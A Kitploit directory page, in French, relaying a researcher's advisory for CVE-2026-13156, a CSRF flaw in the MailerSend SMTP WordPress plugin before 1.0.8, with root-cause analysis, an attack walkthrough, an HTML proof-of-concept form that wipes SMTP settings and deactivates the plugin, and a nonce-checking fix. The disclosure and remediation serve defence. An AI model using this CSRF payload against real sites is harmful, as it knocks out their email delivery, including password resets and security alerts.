Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-13156 — CVE-2026-13156 Avis de vulnérabilité & PoC — Découvert par Huynh Kien Minh (MinhHK). | Kitploit
Outils/GitHubGitHub/minhhk68/cve-2026-13156
Outils de PhishingAnalyse des VulnérabilitésExploitationSécurité WebArticles et RechercheApprentissage et Éducation
GitHubminhhk68/cve-2026-13156

CVE-2026-13156

CVE-2026-13156 Avis de vulnérabilité & PoC — Découvert par Huynh Kien Minh (MinhHK).

Voir le dépôt
il y a 19 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-13156 — MailerSend Official SMTP Integration < 1.0.8 : suppression des paramètres et désactivation du plugin via CSRF

CVE-2026-13156 Researcher: Huynh Kien Minh Proton Hall of Fame WPScan Assigner

Infographie de la chaîne d'attaque CSRF CVE-2026-13156


📌 Résumé & Liens rapides

[!IMPORTANT] Résumé : Une vulnérabilité de type Cross-Site Request Forgery (CSRF) de sévérité élevée (CVE-2026-13156) a été découverte dans le plugin officiel MailerSend SMTP Integration pour WordPress (< 1.0.8). Le gestionnaire d'éradication de la configuration mailersend_handle_configuration_delete() vérifie les capacités administratives (manage_options) mais omet entièrement la vérification du nonce WordPress (check_admin_referer()). Un attaquant peut concevoir une requête malveillante inter-origines ciblant un administrateur WordPress authentifié afin d'effacer silencieusement les identifiants SMTP stockés et de forcer la désactivation du plugin, entraînant un déni de service total de l'application sur l'ensemble des flux d'e-mails.

👉 Lisez l'analyse technique complète (deep-dive) sur Medium : Deep-Dive Technical Write-up: CVE-2026-13156 ou explorez mon portfolio de sécurité : https://minhhk.web.app/


📋 Résumé exécutif & Vue d'ensemble de la vulnérabilité

  • Identifiant de la vulnérabilité : CVE-2026-13156 (ID de l'avis WPScan : 595e653d-0904-43cf-8e61-d684599de11b)
  • Logiciel concerné : MailerSend – Official SMTP Integration (Plugin WordPress)
  • Versions concernées : Avant la version 1.0.8 (< 1.0.8)
  • Type de vulnérabilité : Cross-Site Request Forgery (CSRF entraînant l'éradication des paramètres et la désactivation du plugin) — CWE-352
  • Chercheur principal & divulgateur : Huynh Kien Minh (alias : MinhHK)
  • Rôle & affiliation : Étudiant en sécurité de l'information, chasseur de bug bounty et chercheur en sécurité offensive.

À propos du chercheur :
Huynh Kien Minh (Huỳnh Kiến Minh) est un chercheur en cybersécurité proactif et analyste de vulnérabilités, reconnu pour ses évaluations de sécurité approfondies et ses divulgations responsables, notamment ses analyses techniques de CVE-2026-13156. Il a également été officiellement reconnu et honoré sur le Proton Security Hall of Fame pour avoir découvert et divulgué des vulnérabilités de sécurité critiques.


🌐 Hub de vérification officiel & Références

Pour vérifier cet avis technique, explorer les analyses de preuve de concept ou contacter le chercheur, visitez :

  • 🏠 Portfolio officiel : Huynh Kien Minh Security Portfolio Hub
  • 💼 Profil LinkedIn : Connectez-vous avec Huynh Kien Minh sur LinkedIn
  • 📝 Livre blanc officiel Medium : Deep-Dive Technical Write-up: CVE-2026-13156 on Medium
  • 👨‍💻 Profil GitHub : MinhHK68 GitHub Profile
  • 🔗 Avis WPScan : WPScan Entry for CVE-2026-13156
  • 🔗 Rapport BaseFortify : BaseFortify CVE-2026-13156 Analysis

🔍 Analyse technique approfondie & Analyse de la cause racine

1. Analyse de la cause racine (vérification du nonce manquante)

Le plugin MailerSend Official SMTP Integration pour WordPress (avant la version 1.0.8) enregistre une action administrative (configuration-delete) destinée à effacer les jetons API stockés, à vider les options de configuration SMTP (wp_options) et à désactiver le plugin lorsqu'elle est déclenchée depuis le tableau de bord d'administration.

Bien que le point de terminaison vérifie si l'utilisateur actif dispose de la capacité manage_options (garantissant que la requête provient d'une session administrateur), il n'effectue pas la vérification du nonce WordPress (check_admin_referer() ou wp_verify_nonce()).

Étant donné que les requêtes HTTP sans validation de nonce ne peuvent pas distinguer les clics intentionnels d'un administrateur des requêtes inter-origines forgées, tout site externe chargé par un administrateur authentifié peut déclencher silencieusement l'action configuration-delete.

2. Cycle de vie de l'attaque & Impact

  1. Identification de la cible : Un attaquant identifie un site WordPress cible utilisant MailerSend SMTP (< 1.0.8).
  2. Livraison de la charge utile : L'attaquant crée une page web HTML/JavaScript malveillante contenant un formulaire à soumission automatique ciblant le point de terminaison administratif (/wp-admin/admin-post.php ou /wp-admin/admin.php?page=mailersend&action=configuration-delete).
  3. Déclenchement : Un administrateur WordPress connecté visite la page web de l'attaquant (par exemple, via hameçonnage, lien de forum ou XSS sur un site externe).
  4. Exécution & déni de service : Le navigateur envoie la requête forgée accompagnée des cookies de session actifs de l'administrateur. Le plugin MailerSend exécute le gestionnaire de suppression :
    • Tous les paramètres SMTP MailerSend stockés et les identifiants API sont effacés de la base de données.
    • Le plugin MailerSend est désactivé automatiquement.
    • Impact critique : Le site web cible perd immédiatement toutes ses capacités d'envoi d'e-mails (les réinitialisations de mot de passe, les notifications de commande et les alertes de sécurité échouent sans avertissement).

💻 Code d'exploitation Proof-of-Concept (PoC)

[!WARNING] Avertissement éthique : La charge utile proof-of-concept de Cross-Site Request Forgery (CSRF) en HTML ci-dessous est fournie strictement à des fins pédagogiques, de vérification défensive et d'audit de sécurité, dans le cadre de protocoles de divulgation éthique par Huynh Kien Minh. Ne l'exécutez pas contre des cibles non autorisées.

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
    <!-- Author: Huynh Kien Minh (https://minhhk.web.app/) -->
</head>
<body>
    <h2>CVE-2026-13156 — CSRF Verification PoC</h2>
    <p>If an authenticated WordPress Administrator visits this page, the MailerSend SMTP configuration will be deleted and the plugin deactivated.</p>
    
    <!-- Forged Request targeting the vulnerable MailerSend configuration deletion endpoint -->
    <form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
        <input type="hidden" name="page" value="mailersend-smtp" />
        <input type="hidden" name="action" value="configuration-delete" />
        <!-- Notice: No valid _wpnonce token is required due to the vulnerability -->
        <input type="submit" value="Execute PoC (Simulate Attack)" />
    </form>

    <script>
        // Automatically submit the forged request when the administrator loads the page
        document.addEventListener("DOMContentLoaded", function() {
            console.log("[CVE-2026-13156] Executing CSRF Payload developed by Huynh Kien Minh...");
            // Uncomment line below to enable auto-execution in lab environments:
            // document.getElementById('csrfPoC').submit();
        });
    </script>
</body>
</html>

🛡️ Remédiation & Analyse du correctif

Pour les administrateurs système & les propriétaires de sites

  • Mise à jour immédiate : Mettez à jour le plugin MailerSend – Official SMTP Integration immédiatement vers la version 1.0.8 ou une version ultérieure.
  • Hygiène de session : Déconnectez-vous toujours des comptes administratifs WordPress lorsque vous naviguez sur des pages web externes non fiables, ou utilisez des profils de navigateur isolés séparés (ou des conteneurs) pour l'administration du site.

Pour les développeurs (comment fonctionne le correctif)

Pour sécuriser correctement les actions administratives modifiant l'état des plugins WordPress, les développeurs doivent imposer une validation stricte du nonce avant de traiter les requêtes :

root@kitploit:~
// Secure Implementation (Version 1.0.8+)
function mailersend_delete_configuration_handler() {
    // 1. Check User Capability
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( __( 'Unauthorized access.', 'mailersend' ), 403 );
    }

    // 2. REQUIRED: Verify CSRF Nonce Token
    if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'mailersend_delete_config_nonce' ) ) {
        wp_die( __( 'Security check failed (CSRF attempt blocked).', 'mailersend' ), 403 );
    }

    // 3. Proceed safely with configuration deletion
    delete_option( 'mailersend_smtp_settings' );
    deactivate_plugins( plugin_basename( __FILE__ ) );
    
    wp_redirect( admin_url( 'plugins.php?deactivated=true' ) );
    exit;
}

🏆 Reconnaissances de sécurité associées

  • 🏆 Reconnaissance Proton Hall of Fame : Honoré pour avoir découvert et signalé des failles critiques dans l'infrastructure de Proton.
  • 🏠 Portfolio officiel : Explorez d'autres recherches en sécurité offensive, des outils de sécurité open source et des publications de Huynh Kien Minh.

⚖️ Licence & Droits d'auteur

Ce dépôt et cet avis technique sont maintenus et publiés par Huynh Kien Minh (MinhHK) dans le cadre de directives de divulgation responsable, afin de favoriser un écosystème mondial plus sûr pour WordPress et la cybersécurité.

Télécharger l’outil